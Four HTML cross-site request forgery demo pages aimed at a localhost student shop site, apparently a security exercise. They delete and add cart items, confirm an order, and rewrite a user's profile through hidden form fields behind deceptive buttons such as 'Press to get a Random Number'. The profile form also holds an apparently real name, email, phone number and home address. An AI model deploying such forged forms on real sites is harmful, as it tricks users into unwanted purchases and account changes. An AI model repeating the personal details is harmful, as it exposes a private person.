




<!DOCTYPE html>
<html>
<head>
	<title>CSRF</title>
</head>
<body>
	<a href="http://localhost/miniproject_website/productcart.php?p=1">Click me</a> 
    <!-- If user click this link then productid 1 will be deleted from  cart -->
</body>
</html>






<!DOCTYPE html>
<html>
<head>
    <title>CSRF</title>
</head>
<body>
	<form action="http://localhost/miniproject_website/productcart.php" method="POST">
		<input type="hidden" name="quantity" value='10'>
		<input type="hidden" name="productid" value='1'>
		<input type="submit" value="Press to get a Random Number">
        <!-- If user click this link then productid 1 will be added to  cart -->
	</form>
</body>
</html>



<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
<form action="http://localhost/miniproject_website/buy.php" method="POST">
    <input type="submit" value="Click to open image">
    <!-- This code will confirm the Order  -->
</body>
</html>
	

<!DOCTYPE html>
<html>
<head>
    <title></title>
</head>
<body>
<form id="login" method="post" action="edit.php">  
        <input type="hidden" name="Fname" id="Uname" placeholder="First name" value="Prajwal">    
        <br><br>  

        <label>      
            
        </label>       
        <input type="hidden" name="Lname" id="Uname" placeholder="Last name" value="A">    
        <br><br>   

        <label>     </label>     <input type="hidden" name="email" id="Pass" placeholder="email@gmail.com"  value="prajwalcbk38@gmail.com">    
          
        <br><br>    

        <label>   
            
        </label>       
        <input type="hidden" name="number" id="Pass" placeholder="9876543210" value="6362577248">    
        <br><br>    

        <label>  
            
        </label>       
        <input type="hidden" name="address" id="Pass" value="Muthur Mallur post Chikkaballapur">    
        <br><br>    

        <label>
            
        </label>       
        <input type="hidden" name="pincode" id="Pass" placeholder="562102" value="562102">    
        <br><br>    
            </table> 
         <input type="submit" value="Edit Profile">     
        <br><br>    
    </form>  
<!--  This code changes the details of the user--> 
</body>
</html>